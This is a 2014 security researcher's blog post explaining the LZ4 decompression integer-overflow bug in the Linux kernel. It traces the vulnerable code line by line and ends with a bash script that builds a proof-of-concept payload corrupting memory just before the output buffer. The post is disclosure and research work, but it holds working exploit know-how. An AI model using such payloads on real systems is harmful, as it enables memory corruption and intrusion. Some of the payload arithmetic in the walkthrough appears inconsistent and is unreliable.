Friday, June 27, 2014

Understanding the LZ4 Memory Corruption Vulnerability

You Don't Play Right

The entire premise behind security auditing is to identify ways that software can be abused. Period. Our concern as analysts is not to evaluate software "within the parameters in which it should be used". The best security bugs are slight abuses of an API outside of the normal use cases. So, when an engineer claims that a flaw isn't a flaw at all because "no one will ever use the API in that fashion", they are misinformed. Unfortunately, by asserting this, they are also misinforming their peers and users. 

A similar issue has arisen here. The claim has been made that LZ4 is not vulnerable because every implementation will only call it with a certain amount of memory. OK, so those use cases aren't vulnerable. I admitted this in my original blog post when I stated that ZFS is a perfect example of LZ4 not being vulnerable because it limits its block size to 128k. Regardless, I haven't audited every implementation that uses LZ4, so I cannot assert whether all, some, or none of the use cases are vulnerable. That would be speculation, which is a waste of everyone's time.

There is a more important point. The point is that the algorithm doesn't care about size. There is no check in the decompression routine to determine whether an input buffer is too large, or even within the bounds of the algorithm's specification. There is no validation routine to ensure that the output buffer doesn't exceed a threshold. This means that anyone can use that code and call it in any way they choose. The caller doesn't have to play by the author's original rules, and the caller may not even know the rules because the algorithm doesn't enforce any. 
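As a minimal sketch of the kind of guard described above as missing, a caller-facing wrapper could reject oversized buffers before any decoding starts. The names checked_sizes_ok and MAX_BLOCK are hypothetical, and the 128k limit is borrowed from the ZFS example purely for illustration; none of this is taken from the LZ4 sources.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical limit for illustration only; not an LZ4 constant. */
#define MAX_BLOCK ((size_t)128 * 1024)

/* Return true only when both buffers are non-empty and within the limit. */
static bool checked_sizes_ok(size_t in_len, size_t out_len)
{
    if (in_len == 0 || out_len == 0)
        return false;
    return in_len <= MAX_BLOCK && out_len <= MAX_BLOCK;
}
```

A wrapper like this would call the decompressor only when checked_sizes_ok returns true, so the rule is enforced by the code rather than by convention.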

In fact, there are certain cases where this is desirable behavior. For instance, Anti Virus and Anti Spyware programs must be able to parse compressed data in order to evaluate whether a file is suspicious. If known variants of a virus or spyware break a compression's specification to evade A/V detection, so must the A/V application. This leaves A/V utilities open to vulnerabilities that they did not even intend to have simply because they are using an API in an unintended, but valid, fashion. 

This is how a lot of security vulnerabilities arise in projects. Code isn't adequately documented, or API calls aren't adequately guarded to enforce the author's constraints. When these gaps occur in APIs meant for general consumption, failures will absolutely occur. It doesn't matter if all current users of the algorithm adhere to a certain standard. There is no guarantee that users in the future will. 

It's Just Not Big Enough

The claim that 64bit platforms are not exploitable is incorrect. This is the same mindset that created today's LZO/LZ4 vulnerability: "No one will ever have enough RAM to cause a 32bit integer overflow!" Well, today we do. Had this bug persisted and propagated further, 64bit architectures would surely be affected in the not-so-distant future.

This kind of attitude has no longevity. If you're building a threat model only for today, rather than one that also projects the states likely to occur in the future, you're not building a safe platform suitable for public consumption. You might as well rewrite the implementation every couple of years to suit the new architectures and platforms that are available.

If we want to engineer safe, efficient, long lasting code, it has to be done using foresight and threat models that accurately account for today's and tomorrow's likely environment. Threat models are not built on a snapshot in time, but on a reasonable projection of the life of a project. If no value is placed on the project's longevity, then it's not a professional, long lasting project. Why use something that isn't expected to last?

A Literal Run Around

Now, on to the fun part. The details of the exploit. Before anyone worries, I reached out to the Linux team to make sure that the patches are in a position where I can post this information. They did not protest, largely because only the API itself is vulnerable - there are no vectors from which exploitation can occur at this time. So, let's take a look. Feel free to follow along at the LXR site. For ease of demonstration, presume a 32bit architecture so the exploit below is practical to test. 

To trigger the bug, two things need to happen. First, we need to be able to point to an address outside the bounds of the valid decompression output buffer. Second, we need to be able to write to that address. Let's start out with issue number one.

Pointing North

To successfully set the write pointer variable 'op' outside of the bounds of the valid decompression buffer, there are a few steps that must be taken. Otherwise, we will hit an error condition and be forced to return from the decompression routine with an error.

 64         while (1) {
 65 
 66                 /* get runlength */
 67                 token = *ip++;
 68                 length = (token >> ML_BITS);
 69                 if (length == RUN_MASK) {

The code above is the first code we encounter on entry to the lz4_uncompress routine. Line 69 is the start of the Literal Run length accumulator, the loop that allows for integer overflow. However, we can't use it here. Why? If we trigger the overflow in this accumulator now, we will error out too early. Instead, we must ignore this instance of the vulnerability and move on.
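The way a token byte is split at lines 68 and 105 can be sketched as follows. This is an illustration, not the kernel's code: ML_BITS is assumed to be 4 (consistent with ML_MASK being 0x0f), RUN_MASK is assumed to be 0x0f, and the two helper names are hypothetical.

```c
#include <stdint.h>

#define ML_BITS  4                              /* assumed; matches ML_MASK == 0x0f */
#define ML_MASK  ((1U << ML_BITS) - 1)
#define RUN_MASK ((1U << (8 - ML_BITS)) - 1)    /* assumed to be 0x0f */

/* High nibble of the token: the literal run length read at line 68. */
static unsigned token_run_length(uint8_t token)
{
    return (unsigned)token >> ML_BITS;
}

/* Low nibble of the token: the match length read at line 105. */
static unsigned token_match_length(uint8_t token)
{
    return token & ML_MASK;
}
```

Under these assumptions a token of 0xf0 enters the accumulator at line 69, while a token of 0x0f skips it and instead satisfies the ML_MASK test further down the loop.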

 78                 /* copy literals */
 79                 cpy = op + length;
 80                 if (unlikely(cpy > oend - COPYLENGTH)) {
 81                         /*
 82                          * Error: not enough place for another match
 83                          * (min 4) + 5 literals
 84                          */
 85                         if (cpy != oend)
 86                                 goto _output_error;
 87 
 88                         memcpy(op, ip, length);
 89                         ip += length;
 90                         break; /* EOF */
 91                 }
 92                 LZ4_WILDCOPY(ip, op, cpy);
 93                 ip -= (op - cpy);
 94                 op = cpy;

Next, we have to bypass the above code without triggering an EOF condition and breaking the loop. To do this, we simply place a small literal copy value as the first input byte. This will ensure the expression at line 80 does not evaluate to True. 

The LZ4_WILDCOPY will copy a few bytes from the input pointer 'ip' to the output pointer 'op'. Note that the copy can run past 'cpy', so line 93 rewinds 'ip' by the overshoot (op - cpy). Line 94 then sets the output pointer to 'cpy', so it points, as expected, at the next available output byte.
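The copy-then-rewind behaviour of lines 92 to 94 can be modelled with a small sketch. It assumes the wild copy moves fixed 8 byte packets and always copies at least one; PACKET and copy_literals are hypothetical names, and the real macro may differ in detail.

```c
#include <stddef.h>
#include <string.h>

#define PACKET 8   /* assumed packet size, for illustration */

/*
 * Copy 'length' literals in whole packets, then rewind the input
 * pointer by the overshoot, as lines 92-93 do. Returns how far the
 * input pointer has advanced once the rewind has been applied.
 * Both buffers must have room for 'length' rounded up to a packet.
 */
static size_t copy_literals(const unsigned char *ip, unsigned char *op,
                            size_t length)
{
    const unsigned char *start = ip;
    unsigned char *cpy = op + length;

    do {                        /* at least one packet is always copied */
        memcpy(op, ip, PACKET);
        op += PACKET;
        ip += PACKET;
    } while (op < cpy);

    ip -= (op - cpy);           /* line 93: undo the overshoot */
    return (size_t)(ip - start);
}
```

With a length of zero the sketch still writes one packet to the output, but the input pointer ends up exactly where it started.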

 96                 /* get offset */
 97                 LZ4_READ_LITTLEENDIAN_16(ref, cpy, ip);
 98                 ip += 2;
 99 
100                 /* Error: offset create reference outside destination buffer */
101                 if (unlikely(ref < (BYTE *const) dest))
102                         goto _output_error;

This is where things get slightly tricky. The code on line 97 retrieves a 16bit little-endian offset from the input buffer and uses it to compute the "reference" pointer 'ref'. Remember that the input pointer has been rewound? This means that we need to embed the offset at the start of the literal copy, which in this payload is immediately after the token.

We also have to bypass the check at line 101. Since 'ref' is a pointer into the output buffer, and we can't really abuse it to corrupt memory, we should just set the offset to zero to ignore the whole mess. Therefore, we have our first real values in the payload: 0x00, 0x00. These two bytes will give us a 'ref' offset of 0x0000.
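A rough model of the offset read at line 97 is shown below. It assumes the macro subtracts a 16bit little-endian offset from 'cpy' to obtain 'ref'; read_le16 and match_ref are hypothetical helper names, not kernel functions.

```c
#include <stdint.h>

/* Read two bytes as a little-endian 16bit value. */
static uint16_t read_le16(const unsigned char *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* Assumed behaviour of line 97: ref = cpy - offset. */
static const unsigned char *match_ref(const unsigned char *cpy,
                                      const unsigned char *ip)
{
    return cpy - read_le16(ip);
}
```

With the payload bytes 0x00, 0x00 the offset is zero, so 'ref' equals 'cpy' and the check at line 101 cannot fire.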

104                 /* get matchlength */
105                 length = token & ML_MASK;
106                 if (length == ML_MASK) {
107                         for (; *ip == 255; length += 255)
108                                 ip++;
109                         length += *ip++;
110                 }

Next, we hit the code chunk at line 105. The token value is the same value that was read at the top of this loop, when we entered the function. This means that the low four bits of the first byte of the input payload must equal ML_MASK to reach the above (second) length accumulator. Since ML_MASK is defined as 0x0f, this becomes our first byte in the payload. Now we know what the first three bytes have to be: 0x0f, 0x00, 0x00.

Because the input pointer is now at address &input[3], and we are trying to abuse this accumulator loop to build a large value, we need a large number of bytes here that equal 255. On line 107, as long as a byte from the input buffer equals 255, the loop will continue, and 'length' will grow.

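Remember two things. First, the token's low nibble must equal ML_MASK, which means that the token variable must equate to 0x0f. Because line 68 takes the first run length from the high nibble, that first Literal Run has a length of zero, and 'ip' ends up back at the byte right after the token. Second, the two bytes at that position must be 0x00 0x00 for 'ref'. Everything after them feeds the accumulator; the script at the bottom of this post writes the first thirteen 0xff bytes in the same chunk as the 'ref' bytes.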

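In this run, we will generate a sample value of 0xffffffdc. To do so, we need a total of 16,843,008 bytes set to 0xff. We already have thirteen bytes, so we need 16,842,995 more.

To break out of the for loop on line 107, we simply finish the run with the value 0xcd. Starting from the initial 15, this completes the 'length' variable's accumulation: 15 + (16,843,008 x 255) + 0xcd = 0xffffffdc on a 32bit platform, or -36 when read as a signed value. The script's target of 32 bytes before the buffer follows once 'op' has been advanced by four bytes in the block at line 113.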
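The accumulation can be checked with a short sketch that replays lines 105 to 109 using a 32bit 'length'. The function name and its parameters are hypothetical; the loop simply adds 255 once per 0xff byte and then adds the terminating byte.

```c
#include <stdint.h>

/*
 * Model of lines 105-109 with a 32bit 'length':
 *   start - value of (token & ML_MASK) on entry, 15 for this payload
 *   n_ff  - number of consecutive 0xff bytes in the input
 *   last  - the first byte that is not 0xff, which ends the loop
 */
static uint32_t accumulate_length(uint32_t start, uint32_t n_ff, uint8_t last)
{
    uint32_t length = start;

    for (uint32_t i = 0; i < n_ff; i++)
        length += 255;          /* line 107: one step per 0xff byte */
    length += last;             /* line 109 */
    return length;
}
```

Calling accumulate_length(15, 16843008, 0xcd) models the payload in this post and yields 0xffffffdc, which is 36 short of wrapping to zero.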

112                 /* copy repeated sequence */
113                 if (unlikely((op - ref) < STEPSIZE)) {

The expression at line 113 evaluates to True. We don't really care about this block of code: apart from advancing 'op' by a few bytes, nothing that is performed here needs to be accounted for.

132                 cpy = op + length - (STEPSIZE - 4);
133                 if (cpy > (oend - COPYLENGTH)) {
134 
135                         /* Error: request to write beyond destination buffer */

This is where things get fun. On line 132, the overflow occurs. Now that we have a sufficiently large value in 'length', we can overflow the pointer 'op'. This will cause 'cpy' to point to an address prior to the start of the output buffer. Since it is before even the beginning of the output buffer, the expression on 133 will never evaluate to True, bypassing this error check.
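To see why the check at line 133 is bypassed, the pointer arithmetic can be modelled with 32bit unsigned integers standing in for addresses. This is only a sketch: COPYLENGTH is assumed to be 8, (STEPSIZE - 4) is assumed to be zero on a 32bit build, and the function name and addresses are made up for the example.

```c
#include <stdbool.h>
#include <stdint.h>

#define COPYLENGTH 8u   /* assumed value, for illustration */

/*
 * Model of lines 132-133 on a 32bit platform, where addresses wrap
 * modulo 2^32. Stores the computed 'cpy' in *cpy_out and returns
 * true if the bounds check would reject it.
 */
static bool line133_rejects(uint32_t op, uint32_t length, uint32_t oend,
                            uint32_t *cpy_out)
{
    uint32_t cpy = op + length;     /* wraps around for huge lengths */

    *cpy_out = cpy;
    return cpy > oend - COPYLENGTH;
}
```

With a hypothetical buffer at 0x10000000, 'op' four bytes into it, and a length of 0xffffffdc, 'cpy' wraps to 0x0fffffe0, which is below the buffer and therefore passes the check. An honest but oversized length such as 0x2000 is rejected.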

150                 LZ4_SECURECOPY(ref, op, cpy);
151                 op = cpy; /* correction */
152         }

The LZ4_SECURECOPY is actually a NO-OP here. Why? It checks that 'op' is before 'cpy' before performing the actual copy operation. Here it is not, so no copy occurs. But that is OK, because we don't want the copy to occur here. Instead, something better happens. The pointer 'op' is set to 'cpy', so the output pointer now points to a memory address we control.
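The guard can be sketched as below. This is a byte-at-a-time stand-in for the real packet copy, and secure_copy is a hypothetical name; the only point is that nothing is written when 'op' is not below 'cpy'.

```c
#include <stddef.h>

/*
 * Copy from 'ref' to 'op' only while 'op' is below 'cpy'.
 * Returns the number of bytes written, which is zero when the
 * destination is already at or past 'cpy'.
 */
static size_t secure_copy(const unsigned char *ref, unsigned char *op,
                          const unsigned char *cpy)
{
    size_t copied = 0;

    if (!(op < cpy))
        return 0;               /* the no-op case described above */

    while (op < cpy) {
        *op++ = *ref++;
        copied++;
    }
    return copied;
}
```

In the exploit path 'cpy' has wrapped to an address below 'op', so the early return is taken and the only lasting effect is the assignment at line 151.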

Lastly, at line 152, we loop back to the top of the function. 

Writing Home

Now that we are back at the start of the while loop, we can write as much data as we like to whichever address in memory we desire. How? We simply specify the size of the write using either the simple length value or the Literal Run accumulator loop.

 64         while (1) {
 65 
 66                 /* get runlength */
 67                 token = *ip++;
 68                 length = (token >> ML_BITS);
 69                 if (length == RUN_MASK) {

Once the length is generated, a copy is executed in the following code that we've already looked at:

 92                 LZ4_WILDCOPY(ip, op, cpy);
 93                 ip -= (op - cpy);
 94                 op = cpy;

That's it! The memory overwrite is complete. We have copied any number of bytes we choose to anywhere in memory we desire. This makes the LZ4 vulnerability far more precise than the LZO one.

Make It Easy


At the bottom of this post, you'll find a script I've written to auto-generate the test payload above. It will overwrite memory 32 bytes prior to the start of the valid output buffer. This is valid memory corruption and can be tested fairly easily using the patched version of the Linux kernel's lz4_decompress.c from here.

Summary


To summarize, security auditing isn't about exploitation. Auditing is about finding critical bugs. Critical bugs don't have to have an immediate context for exploitation; they just have to be legitimately critical flaws that could affect multiple platforms in the near future. This is true of the LZ4 vulnerability. Library based vulnerabilities:
  • Are critical if they cause precise memory corruption, regardless of current use cases
  • Are often present or magnified in abnormal use cases such as Anti Virus applications
  • Are often exploitable regardless of underlying architecture
  • Must be evaluated from a context of longevity
  • Cannot be ignored because current use cases aren't vulnerable; libraries can be used any way the application writer chooses
I hope this helps everyone understand my position on the critical nature of the LZ4 vulnerability. No, it currently won't get you Ring or Uid 0 on Linux. But, by closing this hole today, we know no one will get it in the future, either. And that's really what this is all about, right?

Best wishes,
Don A. Bailey
Founder / CEO
Lab Mouse Security
@InfoSecMouse
https://www.securitymouse.com/

#!/bin/bash
#
# LZ4 Exploit Payload Generator
# Don A. Bailey 
#
# Overwrites memory with "donbdonb" 32 bytes prior to the valid start of
# the decompression output buffer.
# June 27th, 2014
#

FILE=./test.lz4

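# append the given escape sequence to the payload file as raw bytes
append()
{
 printf "$1" >> "$FILE"
}

# start from an empty payload file
init()
{
 rm -f "$FILE"
 touch "$FILE"
}

# append $1 bytes of 0xff to the payload file
large()
{
 perl -e 'print "\xff" x $ARGV[0]' "$1" >> "$FILE"
}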

# initialize the file
init

# simple literal run; no RUN_MASK
# the low nibble is ML_MASK so the second accumulator is entered
append "\x0f"

# embed a null ref, followed by the first thirteen 0xff bytes
# the second mask must be embedded here as well
# note that the second mask starts at the first 0xff
append "\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

# goal is 0xffffffdc: 15 + (16843008 * 255) + 0xcd
# now we need (16843008 - 13) 0xff bytes
large 16842995

# complete the sequence
append "\xcd"

# because cpy is lower than op, LZ4_SECURECOPY will not copy anything
# op is now set to the mangled cpy

# create a simple literal run length without a RUN_MASK
# and copy 8 bytes to the corrupted pointer address
append "\x08"

append "donbdonb"

